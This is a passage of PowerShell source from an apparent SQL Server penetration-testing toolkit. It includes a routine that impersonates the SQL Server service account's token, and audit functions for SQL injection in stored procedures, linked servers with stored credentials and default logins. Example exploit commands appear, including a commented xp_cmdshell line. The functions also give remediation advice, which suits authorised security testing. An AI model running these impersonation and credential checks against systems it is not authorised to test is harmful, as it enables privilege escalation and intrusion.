}\n\n    Process\n    {\n        \n        # Revert to original user context if flag is provided\n        if($Rev2Self){          \n            Invoke-TokenManipulation -RevToSelf | Out-Null\n            Return\n        }\n\n        # Check for provide instance\n        if(-not $Instance){\n            Write-Verbose \"$Instance : No instance provided.\"\n            Return\n        }\n\n        # Get current user name\n        $WinCurrentUserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().name\n\n        # Verify local administrator privileges\n        $IsAdmin = Get-SQLLocalAdminCheck\n                \n        # Return if the current user does not have local admin privs\n        if($IsAdmin -ne $true){\n            write-verbose  \"$Instance : $WinCurrentUserName DOES NOT have local admin privileges.\"\n            return\n        }else{\n            write-verbose  \"$Instance : $WinCurrentUserName has local admin privileges.\"\n        }\n\n        # Check for running sql service processes that match the instance\n        Write-Verbose -Message \"$Instance : Impersonating SQL Server process:\" \n        [int]$TargetPid = Get-SQLServiceLocal -SuppressVerbose -instance $Instance -RunOnly | Where-Object {$_.ServicePath -like \"*sqlservr.exe*\"} | Select-Object ServiceProcessId -ExpandProperty ServiceProcessId\n        [string]$TargetServiceAccount = Get-SQLServiceLocal -SuppressVerbose -instance $Instance -RunOnly | Where-Object {$_.ServicePath -like \"*sqlservr.exe*\"} | Select-Object ServiceAccount -ExpandProperty ServiceAccount\n                \n        # Return if no matches exist\n        if ($TargetPid -eq 0){\n            Write-Verbose -Message \"$Instance : No process running for provided instance...\"\n            return\n        }\n\n        # Status user if a match is found\n        Write-Verbose -Message \"$Instance : - Process ID: $TargetPid\"\n        Write-Verbose -Message \"$Instance : - ServiceAccount: $TargetServiceAccount\" \n                \n        # Attempt impersonation \n        try{\n            Get-Process | Where-Object {$_.id -like $TargetPid} | Invoke-TokenManipulation -Instance $Instance -ImpersonateUser -ErrorAction Continue | Out-Null               \n        }catch{\n            $ErrorMessage = $_.Exception.Message\n            Write-Verbose -Message \"$Instance : Impersonation failed.\"\n            Write-Verbose  -Message \" $Instance : $ErrorMessage\"\n            return\n        }  \n        \n        Write-Verbose  -Message \"$Instance : Done.\"                    \n    }\n\n    End\n    {\n    }\n}\n\n\n# ---------------------------------------\n# Invoke-SQLAuditSQLiSpExecuteAs\n# ---------------------------------------\n# Author: Scott Sutherland\nFunction Invoke-SQLAuditSQLiSpExecuteAs\n{\n    <#\n            .SYNOPSIS\n            This will return stored procedures using dynamic SQL and the EXECUTE AS OWNER clause that may suffer from SQL injection.\n            There is also an options to check for \n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER Exploit\n            Exploit vulnerable issues.\n            .EXAMPLE\n            PS C:\\> Invoke-SQLAuditSQLiSpExecuteAs -Instance SQLServer1\\STANDARDDEV2014\n\n            ComputerName  : SQLServer1\n            Instance      : SQLServer1\\STANDARDDEV2014\n            Vulnerability : Potential SQL Injection\n            Description   : The affected procedure is using dynamic SQL and the \"EXECUTE AS OWNER\" clause.  As a result, it may be possible to impersonate the procedure owner if SQL injection is possible.\n            server.\n            Remediation   : Consider using parameterized queries instead of concatenated strings, and use signed procedures instead of the \"EXECUTE AS OWNER\" clause.'\n            Severity      : High\n            IsVulnerable  : Yes\n            IsExploitable : No\n            Exploited     : No\n            ExploitCmd    : No automated exploitation option has been provided, but to view the procedure code use: Get-SQLStoredProcedureSQLi -Verbose -Instance SQLServer1\\STANDARDDEV2014 -Keyword \"EXECUTE AS OWNER\" \n            Details       : The testdb.dbo.sp_vulnerable stored procedure is affected.\n            Reference     : https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation\n            Author        : Scott Sutherland (@_nullbind), NetSPI 2016\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Invoke-SQLAuditSQLiSpExecuteAs -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't output anything.\")]\n        [string]$NoOutput,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Exploit vulnerable issues.')]\n        [switch]$Exploit\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblData = New-Object -TypeName System.Data.DataTable\n        $null = $TblData.Columns.Add('ComputerName')\n        $null = $TblData.Columns.Add('Instance')\n        $null = $TblData.Columns.Add('Vulnerability')\n        $null = $TblData.Columns.Add('Description')\n        $null = $TblData.Columns.Add('Remediation')\n        $null = $TblData.Columns.Add('Severity')\n        $null = $TblData.Columns.Add('IsVulnerable')\n        $null = $TblData.Columns.Add('IsExploitable')\n        $null = $TblData.Columns.Add('Exploited')\n        $null = $TblData.Columns.Add('ExploitCmd')\n        $null = $TblData.Columns.Add('Details')\n        $null = $TblData.Columns.Add('Reference')\n        $null = $TblData.Columns.Add('Author')\n    }\n\n    Process\n    {\n        # Status User\n        Write-Verbose -Message \"$Instance : START VULNERABILITY CHECK: Potential SQL Injection - EXECUTE AS OWNER\"\n\n        # Test connection to server\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if(-not $TestConnection)\n        {\n            # Status user\n            Write-Verbose -Message \"$Instance : CONNECTION FAILED.\"\n            Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: Potential SQL Injection - EXECUTE AS OWNER.\"\n            Return\n        }\n\n        # Grab server information\n        $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        $CurrentLogin = $ServerInfo.CurrentLogin\n        $ComputerName = $ServerInfo.ComputerName\n\n        # --------------------------------------------\n        # Set function meta data for report output\n        # --------------------------------------------\n        if($Exploit)\n        {\n            $TestMode  = 'Exploit'\n        }\n        else\n        {\n            $TestMode  = 'Audit'\n        }\n        $Vulnerability = 'Potential SQL Injection - EXECUTE AS OWNER'\n        $Description   = 'The affected procedure is using dynamic SQL and the \"EXECUTE AS OWNER\" clause.  As a result, it may be possible to impersonate the procedure owner if SQL injection is possible.'\n        $Remediation   = 'Consider using parameterized queries instead of concatenated strings, and use signed procedures instead of the \"EXECUTE AS OWNER\" clause.'\n        $Severity      = 'High'\n        $IsVulnerable  = 'No'\n        $IsExploitable = 'No'\n        $Exploited     = 'No'\n        $ExploitCmd    = \"No automated exploitation option has been provided, but to view the procedure code use: Get-SQLStoredProcedureSQLi -Verbose -Instance $Instance -Keyword `\"EXECUTE AS OWNER`\"'\"\n        $Details       = ''\n        $Reference     = 'https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation'\n        $Author        = 'Scott Sutherland (@_nullbind), NetSPI 2016'\n\n        # -----------------------------------------------------------------\n        # Check for the Vulnerability\n        # Note: Typically a missing patch or weak configuration\n        # -----------------------------------------------------------------\n        # $IsVulnerable  = \"No\" or $IsVulnerable  = \"Yes\"\n                \n        # Get SP with dynamic sql and execute as owner\n        $SQLiResults = Get-SQLStoredProcedureSQLi -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Keyword \"EXECUTE AS OWNER\" \n        \n        # Check for results\n        if($SQLiResults.rows.count -ge 1){\n            \n            # Confirmed vulnerable\n            $IsVulnerable = \"Yes\"\n            $IsExploitable = \"Unknown\"\n\n            # Add information to finding for each instance of potential sqli\n            $SQLiResults |\n            ForEach-Object{\n            \n                # Set instance values\n                $DatabaseName = $_.DatabaseName \n                $SchemaName = $_.SchemaName\n                $ProcedureName = $_.ProcedureName\n                $ObjectName = \"$DatabaseName.$SchemaName.$ProcedureName\"\n                $Details =  \"The $ObjectName stored procedure is affected.\"\n                \n                # Add to report \n                $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author)        \n            }\n        }    \n\n        # ------------------------------------------------------------------\n        # Exploit Vulnerability\n        # ------------------------------------------------------------------\n        if($Exploit){\n            Write-Verbose \"$Instance : No automatic exploitation option has been provided. Uninformed exploitation of SQLi can have a negative impact on production environments.\"\n        }\n\n        # Status User\n        Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: Potential SQL Injection - EXECUTE AS OWNER\"\n    }\n\n    End\n    {\n        # Return data\n        if ( -not $NoOutput)\n        {\n            Return $TblData\n        }\n    }\n}\n\n\n# ---------------------------------------\n# Invoke-SQLAuditSQLiSpSigned\n# ---------------------------------------\n# Author: Scott Sutherland\nFunction Invoke-SQLAuditSQLiSpSigned\n{\n    <#\n            .SYNOPSIS\n            This will return stored procedures using dynamic SQL and the EXECUTE AS OWNER clause that may suffer from SQL injection.\n            There is also an options to check for \n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER Exploit\n            Exploit vulnerable issues.\n            .EXAMPLE\n            PS C:\\> Invoke-SQLAuditSQLiSpSigned -Instance SQLServer1\\STANDARDDEV2014\n\n            ComputerName  : SQLServer1\n            Instance      : SQLServer1\\STANDARDDEV2014\n            Vulnerability : Potential SQL Injection\n            Description   : The affected procedure is using dynamic SQL and is signed.  As a result, it may be possible to impersonate the procedure owner if SQL injection is possible.\n            server.\n            Remediation   : Consider using parameterized queries instead of concatenated strings, and use signed procedures instead of the \"EXECUTE AS OWNER\" clause.'\n            Severity      : High\n            IsVulnerable  : Yes\n            IsExploitable : No\n            Exploited     : No\n            ExploitCmd    : No automated exploitation option has been provided, but to view the procedure code use: Get-SQLStoredProcedureSQLi -Verbose -Instance SQLServer1\\STANDARDDEV2014 -Keyword \"EXECUTE AS OWNER\" \n            Details       : The testdb.dbo.sp_vulnerable stored procedure is affected.\n            Reference     : https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation\n            Author        : Scott Sutherland (@_nullbind), NetSPI 2016\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Invoke-SQLAuditSQLiSpSigned -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't output anything.\")]\n        [string]$NoOutput,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Exploit vulnerable issues.')]\n        [switch]$Exploit\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblData = New-Object -TypeName System.Data.DataTable\n        $null = $TblData.Columns.Add('ComputerName')\n        $null = $TblData.Columns.Add('Instance')\n        $null = $TblData.Columns.Add('Vulnerability')\n        $null = $TblData.Columns.Add('Description')\n        $null = $TblData.Columns.Add('Remediation')\n        $null = $TblData.Columns.Add('Severity')\n        $null = $TblData.Columns.Add('IsVulnerable')\n        $null = $TblData.Columns.Add('IsExploitable')\n        $null = $TblData.Columns.Add('Exploited')\n        $null = $TblData.Columns.Add('ExploitCmd')\n        $null = $TblData.Columns.Add('Details')\n        $null = $TblData.Columns.Add('Reference')\n        $null = $TblData.Columns.Add('Author')\n    }\n\n    Process\n    {\n        # Status User\n        Write-Verbose -Message \"$Instance : START VULNERABILITY CHECK: Potential SQL Injection - Signed by Certificate Login\"\n\n        # Test connection to server\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if(-not $TestConnection)\n        {\n            # Status user\n            Write-Verbose -Message \"$Instance : CONNECTION FAILED.\"\n            Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: Potential SQL Injection - Signed by Certificate Login.\"\n            Return\n        }\n\n        # Grab server information\n        $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        $CurrentLogin = $ServerInfo.CurrentLogin\n        $ComputerName = $ServerInfo.ComputerName\n\n        # --------------------------------------------\n        # Set function meta data for report output\n        # --------------------------------------------\n        if($Exploit)\n        {\n            $TestMode  = 'Exploit'\n        }\n        else\n        {\n            $TestMode  = 'Audit'\n        }\n        $Vulnerability = 'Potential SQL Injection - Signed by Certificate Login'\n        $Description   = 'The affected procedure is using dynamic SQL and has been signed by a certificate login.  As a result, it may be possible to impersonate signer if SQL injection is possible.'\n        $Remediation   = 'Consider using parameterized queries instead of concatenated strings.'\n        $Severity      = 'High'\n        $IsVulnerable  = 'No'\n        $IsExploitable = 'No'\n        $Exploited     = 'No'\n        $ExploitCmd    = \"No automated exploitation option has been provided, but to view the procedure code use: Get-SQLStoredProcedureSQLi -Verbose -Instance $Instance -OnlySigned\"\n        $Details       = ''\n        $Reference     = 'https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation'\n        $Author        = 'Scott Sutherland (@_nullbind), NetSPI 2016'\n\n        # -----------------------------------------------------------------\n        # Check for the Vulnerability\n        # Note: Typically a missing patch or weak configuration\n        # -----------------------------------------------------------------\n        # $IsVulnerable  = \"No\" or $IsVulnerable  = \"Yes\"\n                \n        # Get SP with dynamic sql and execute as owner\n        $SQLiResults = Get-SQLStoredProcedureSQLi -Instance $Instance -Username $Username -Password $Password -Credential $Credential -OnlySig\n        \n        # Check for results\n        if($SQLiResults.rows.count -ge 1){\n            \n            # Confirmed vulnerable\n            $IsVulnerable = \"Yes\"\n            $IsExploitable = \"Unknown\"\n\n            # Add information to finding for each instance of potential sqli\n            $SQLiResults |\n            ForEach-Object{\n            \n                # Set instance values\n                $DatabaseName = $_.DatabaseName \n                $SchemaName = $_.SchemaName\n                $ProcedureName = $_.ProcedureName\n                $ObjectName = \"$DatabaseName.$SchemaName.$ProcedureName\"\n                $Details =  \"The $ObjectName stored procedure is affected.\"\n                \n                # Add to report \n                $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author)        \n            }\n        }    \n\n        # ------------------------------------------------------------------\n        # Exploit Vulnerability\n        # ------------------------------------------------------------------\n        if($Exploit){\n            Write-Verbose \"$Instance : No automatic exploitation option has been provided. Uninformed exploitation of SQLi can have a negative impact on production environments.\"\n        }\n\n        # Status User\n        Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: Potential SQL Injection - Signed by Certificate Login\"\n    }\n\n    End\n    {\n        # Return data\n        if ( -not $NoOutput)\n        {\n            Return $TblData\n        }\n    }\n}\n\n\n# ---------------------------------------\n# Invoke-SQLAuditPrivServerLink\n# ---------------------------------------\n# Author: Scott Sutherland\nFunction Invoke-SQLAuditPrivServerLink\n{\n    <#\n            .SYNOPSIS\n            Check if any SQL Server links are configured with remote credentials.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER Exploit\n            Exploit vulnerable issues.\n            .EXAMPLE\n            PS C:\\> Invoke-SQLAuditPrivServerLink -Instance SQLServer1\\STANDARDDEV2014\n\n            ComputerName  : SQLServer1\n            Instance      : SQLServer1\\STANDARDDEV2014\n            Vulnerability : Excessive Privilege - Linked Server\n            Description   : One or more linked servers is preconfigured with alternative credentials which could allow a least privilege login to escalate their privileges on a remote\n            server.\n            Remediation   : Configure SQL Server links to connect to remote servers using the login's current security context.\n            Severity      : Medium\n            IsVulnerable  : Yes\n            IsExploitable : No\n            Exploited     : No\n            ExploitCmd    : Example query: SELECT * FROM OPENQUERY([Server01\\SQLEXPRESS],'Select ''Server: '' + @@Servername +'' '' + ''Login: '' + SYSTEM_USER')\n            Details       : The SQL Server link Server01\\SQLEXPRESS was found configured with the test login.\n            Reference     : https://msdn.microsoft.com/en-us/library/ms190479.aspx\n            Author        : Scott Sutherland (@_nullbind), NetSPI 2016\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Invoke-SQLAuditPrivServerLink -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't output anything.\")]\n        [string]$NoOutput,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Exploit vulnerable issues.')]\n        [switch]$Exploit\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblData = New-Object -TypeName System.Data.DataTable\n        $null = $TblData.Columns.Add('ComputerName')\n        $null = $TblData.Columns.Add('Instance')\n        $null = $TblData.Columns.Add('Vulnerability')\n        $null = $TblData.Columns.Add('Description')\n        $null = $TblData.Columns.Add('Remediation')\n        $null = $TblData.Columns.Add('Severity')\n        $null = $TblData.Columns.Add('IsVulnerable')\n        $null = $TblData.Columns.Add('IsExploitable')\n        $null = $TblData.Columns.Add('Exploited')\n        $null = $TblData.Columns.Add('ExploitCmd')\n        $null = $TblData.Columns.Add('Details')\n        $null = $TblData.Columns.Add('Reference')\n        $null = $TblData.Columns.Add('Author')\n    }\n\n    Process\n    {\n        # Status User\n        Write-Verbose -Message \"$Instance : START VULNERABILITY CHECK: Excessive Privilege - Server Link\"\n\n        # Test connection to server\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if(-not $TestConnection)\n        {\n            # Status user\n            Write-Verbose -Message \"$Instance : CONNECTION FAILED.\"\n            Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Server Link.\"\n            Return\n        }\n        else\n        {\n            Write-Verbose -Message \"$Instance : CONNECTION SUCCESS.\"\n        }\n\n        # Grab server information\n        $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        $CurrentLogin = $ServerInfo.CurrentLogin\n        $ComputerName = $ServerInfo.ComputerName\n\n        # --------------------------------------------\n        # Set function meta data for report output\n        # --------------------------------------------\n        if($Exploit)\n        {\n            $TestMode  = 'Exploit'\n        }\n        else\n        {\n            $TestMode  = 'Audit'\n        }\n        $Vulnerability = 'Excessive Privilege - Linked Server'\n        $Description   = 'One or more linked servers is preconfigured with alternative credentials which could allow a least privilege login to escalate their privileges on a remote server.'\n        $Remediation   = \"Configure SQL Server links to connect to remote servers using the login's current security context.\"\n        $Severity      = 'Medium'\n        $IsVulnerable  = 'No'\n        $IsExploitable = 'No'\n        $Exploited     = 'No'\n        $ExploitCmd    = 'There is not exploit available at this time.'\n        if($Username)\n        {\n            #$ExploitCmd    = \"Invoke-SQLAuditPrivServerLink -Instance $Instance -Username $Username -Password $Password -Exploit\"\n        }\n        else\n        {\n            #$ExploitCmd    = \"Invoke-SQLAuditPrivServerLink -Instance $Instance -Exploit\"\n        }\n        $Details       = ''\n        $Reference     = 'https://msdn.microsoft.com/en-us/library/ms190479.aspx'\n        $Author        = 'Scott Sutherland (@_nullbind), NetSPI 2016'\n\n        # -----------------------------------------------------------------\n        # Check for the Vulnerability\n        # Note: Typically a missing patch or weak configuration\n        # -----------------------------------------------------------------\n\n        # Select links configured with static credentials\n        $LinkedServers = Get-SQLServerLink -Verbose -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | \n        Where-Object { $_.LocalLogin -ne 'Uses Self Credentials' -and ([string]$_.RemoteLoginName).Length -ge 1}\n\n        # Update vulnerable status\n        if($LinkedServers)\n        {\n            $IsVulnerable  = 'Yes'\n            $LinkedServers |\n            ForEach-Object -Process {\n                $Details = \n                $LinkName = $_.DatabaseLinkName\n                $LinkUser = $_.RemoteLoginName\n                $LinkAccess = $_.is_data_access_enabled\n                $ExploitCmd = \"Example query: SELECT * FROM OPENQUERY([$LinkName],'Select ''Server: '' + @@Servername +'' '' + ''Login: '' + SYSTEM_USER')\"\n\n                if($LinkUser -and $LinkAccess -eq 'True')\n                {\n                    Write-Verbose -Message \"$Instance : - The $LinkName linked server was found configured with the $LinkUser login.\"\n                    $Details = \"The SQL Server link $LinkName was found configured with the $LinkUser login.\"\n                    $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author)\n                }\n            }\n        }\n        else\n        {\n            Write-Verbose -Message \"$Instance : - No exploitable SQL Server links were found.\"\n        }\n\n        # -----------------------------------------------------------------\n        # Check for exploit dependancies\n        # Note: Typically secondary configs required for dba/os execution\n        # -----------------------------------------------------------------\n        # $IsExploitable = \"No\" or $IsExploitable = \"Yes\"\n        # Check if the link is alive and verify connection + check if sysadmin\n\n\n        # -----------------------------------------------------------------\n        # Exploit Vulnerability\n        # Note: Add the current user to sysadmin fixed server role\n        # -----------------------------------------------------------------\n        # $Exploited = \"No\" or $Exploited     = \"Yes\"\n        # select * from openquery(\"server\\intance\",'EXEC xp_cmdshell whoami WITH RESULT SETS ((output VARCHAR(MAX)))')\n        # Also, recommend link crawler module\n\n\n        # Status User\n        Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Server Link\"\n    }\n\n    End\n    {\n        # Return data\n        if ( -not $NoOutput)\n        {\n            Return $TblData\n        }\n    }\n}\n\n\n# ---------------------------------------\n# Invoke-SQLAuditDefaultLoginPw\n# ---------------------------------------\n# Author: Scott Sutherland\n# Reference: https://github.com/pwnwiki/pwnwiki.github.io/blob/master/tech/db/mssql.md\nFunction  Invoke-SQLAuditDefaultLoginPw\n{\n    <#\n            .SYNOPSIS\n            Based on the instance name, test if SQL Server is configured with default passwords.\n            There is also an options to check for \n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER Exploit\n            Exploit vulnerable issues.\n            .EXAMPLE\n            PS C:\\> Invoke-SQLAuditDefaultLoginPw -Instance SQLServer1\\STANDARDDEV2014\n\n            ComputerName  : SQLServer1\n            Instance      : SQLServer1\\STANDARDDEV2014\n            Vulnerability : Default SQL Server Login Password\n            Description   : The target SQL Server instance is configured with a default SQL login and password.\n            Remediation   : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy.\n            Severity      : High\n            IsVulnerable  : Yes\n            IsExploitable : No\n            Exploited     : No\n            ExploitCmd    : Get-SQLQuery -Verbose -Instance SQLServer1\\STANDARDDEV2014 -Q \"Select @@Version\" -Username test -Password test. \n            Details       : Affected credentials: test/test.\n            Reference     : https://github.com/pwnwiki/pwnwiki.github.io/blob/master/tech/db/mssql.md\n            Author        : Scott Sutherland (@_nullbind), NetSPI 2016\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Invoke-SQLAuditDefaultLoginPw -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't output anything.\")]\n        [string]$NoOutput,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Exploit vulnerable issues.')]\n        [switch]$Exploit\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblData = New-Object -TypeName System.Data.DataTable\n        $null = $TblData.Columns.Add('ComputerName')\n        $null = $TblData.Columns.Add('Instance')\n        $null = $TblData.Columns.Add('Vulnerability')\n        $null = $TblData.Columns.Add('Description')\n        $null = $TblData.Columns.Add('Remediation')\n        $null = $TblData.Columns.Add('Severity')\n        $null = $TblData.Columns.Add('IsVulnerable')\n        $null = $TblData.Columns.Add('IsExploitable')\n        $null = $TblData.Columns.Add('Exploited')\n        $null = $TblData.Columns.Add('ExploitCmd')\n        $null = $TblData.Columns.Add('Details')\n        $null = $TblData.Columns.Add('Reference')\n        $null = $TblData.Columns.Add('Author')\n    }\n\n    Process\n    {\n        # Status User\n        Write-Verbose -Message \"$Instance : START VULNERABILITY CHECK: Default SQL Server Login Password\"\n\n        # Grab server information\n        $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        $CurrentLogin = $ServerInfo.CurrentLogin\n        $ComputerName = $ServerInfo.ComputerName\n\n        # --------------------------------------------\n        # Set function meta data for report output\n        # --------------------------------------------\n        if($Exploit)\n        {\n            $TestMode  = 'Exploit'\n        }\n        else\n        {\n            $TestMode  = 'Audit'\n        }\n        $Vulnerability = 'Default SQL Server Login Password'\n        $Description   = 'The target SQL Server instance is configured with a default SQL login and password used by a common application.'\n        $Remediation   = 'Ensure all SQL Server logins are required to use a strong password. Consider inheriting the OS password policy.'\n        $Severity      = 'High'\n        $IsVulnerable  = 'No'\n        $IsExploitable = 'No'\n        $Exploited     = 'No'\n        $ExploitCmd    = \"Get-SQLQuery -Verbose -Instance $Instance -Q `\"Select @@Version`\" -Username test -Password test.\"\n        $Details       = ''\n        $Reference     = 'https://github.com/pwnwiki/pwnwiki.github.io/blob/master/tech/db/mssql.md'\n        $Author        = 'Scott Sutherland (@_nullbind), NetSPI 2016'\n\n        # Check for default passwords\n        $Results = Get-SQLServerLoginDefaultPw -Verbose -Instance $Instance \n\n        if($Results){\n            $IsVulnerable = \"Yes\"\n            $IsExploitable = \"Yes\"\n        }\n\n        # Create report records\n        $Results | \n        ForEach-Object {\n            $DefaultComputer = $_.Computer\n            $DefaultInstance = $_.Instance\n            $DefaultUsername = $_.Username\n            $DefaultPassword = $_.Password\n            $DefaultIsSysadmin = $_.IsSysadmin\n\n            # Check if sysadmin\n            \n            # Add record            \n            $Details = \"Default credentials found: $DefaultUsername / $DefaultPassword (sysadmin: $DefaultIsSysadmin).\"\n            $ExploitCmd    = \"Get-SQLQuery -Verbose -Instance $DefaultInstance -Q `\"Select @@Version`\" -Username $DefaultUsername -Password $DefaultPassword\"\n            $null = $TblData.Rows.Add($DefaultComputer, $DefaultInstance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author)                        \n        }        \n        \n        #Status user\n        Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: Default SQL Server Login Password\"\n    }\n    End\n    {           \n        # Return data\n        if ( -not $NoOutput)\n        {\n            Return $TblData\n        }\n    }\n}\n\n\n# ---------------------------------------\n# Invoke-SQLAuditPrivTrustworthy\n# ---------------------------------------\n# Author: Scott Sutherland\nFunction Invoke-SQLAuditPrivTrustworthy\n{\n    <#\n            .SYNOPSIS\n            Check if any databases have been configured as trustworthy.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            